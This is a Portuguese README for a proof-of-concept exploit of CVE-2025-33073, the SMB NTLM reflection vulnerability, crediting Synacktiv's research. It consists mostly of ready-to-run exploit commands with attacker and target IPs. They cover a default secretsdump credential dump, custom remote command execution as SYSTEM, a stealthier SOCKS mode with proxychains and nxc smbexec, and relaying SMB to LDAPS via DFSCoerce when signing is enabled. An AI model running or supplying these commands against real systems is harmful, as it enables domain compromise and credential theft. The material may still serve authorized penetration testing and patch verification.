
Exploit de PoC para a falha de reflexão NTLM do SMB.
PoC de Exploração para a falha de reflexão NTLM no SMB.
Todos os créditos vão para a pesquisa oficial:
https://www.synacktiv.com/en/publications/ntlm-reflection-is-dead-long-live-ntlm-reflection-an-in-depth-analysis-of-cve-2025
SO: Kali Linux (tem a maioria dos pacotes pré-instalados).
A ferramenta usará automaticamente um ambiente virtual. Para configurá-lo, execute:
./setup.sh
Isso criará um ambiente virtual e instalará todas as dependências necessárias, incluindo ldap3-bleeding-edge==2.10.1.1337.
python3 CVE-2025-33073.py -u 'wintastic.local\mathijs' -p 'password' --attacker-ip 192.168.178.49 --dns-ip 192.168.178.138 --dc-fqdn DC01.wintastic.local --target CLIENT01.wintastic.local --target-ip 192.168.178.65
Comando personalizado
Em vez de executar o secretsdump, um comando personalizado pode ser executado.
python3 CVE-2025-33073.py -u 'wintastic.local\mathijs' -p 'password' --attacker-ip 192.168.178.49 --dns-ip 192.168.178.138 --dc-fqdn DC01.wintastic.local --target CLIENT01.wintastic.local --target-ip 192.168.178.65 --custom-command "whoami"

SOCKS
Para execução de comandos mais furtiva após o estabelecimento de uma conexão válida como SYSTEM. --target e --target-ip devem ser iguais aqui.
python3 CVE-2025-33073.py -u 'wintastic.local\mathijs' -p 'password' --attacker-ip 192.168.178.49 --dns-ip 192.168.178.138 --dc-fqdn DC01.wintastic.local --target 192.168.178.65 --target-ip 192.168.178.65 --socks
Também é possível executar um comando personalizado através do proxychains em vez de despejar o SAM.
proxychains nxc smb 192.168.178.65 -d '' -u '' -p '' -x 'whoami' --exec-method smbexec

Foi realizada uma pesquisa para ver se a reflexão realmente não funcionava com SMB signing ativado, o que resultou na descoberta de bugs onde, se SIGN/SEAL forem removidos do pacote, é possível fazer relay de SMB para LDAPS, o que normalmente não é possível devido ao MIC.
Agradecimentos a:
python3 CVE-2025-33073.py -u "thewoods.local\test" -p 'pass' -d 192.168.204.131 --dns-ip 192.168.204.133 --dc-fqdn DC01.thewoods.local --target 192.168.204.133 --target-ip 192.168.204.133 -M DFSCoerce --smb-signing
Se você estiver no mesmo domínio de broadcast do dispositivo e ele for vulnerável a envenenamento LLMNR, é possível explorar um dispositivo sem precisar registrar um registro DNS.

A autenticação NTLM local ocorre

A autenticação NTLM local não ocorre, resultando em uma tentativa com FAILED

https://msrc.microsoft.com/update-guide/en-US/vulnerability/CVE-2025-33073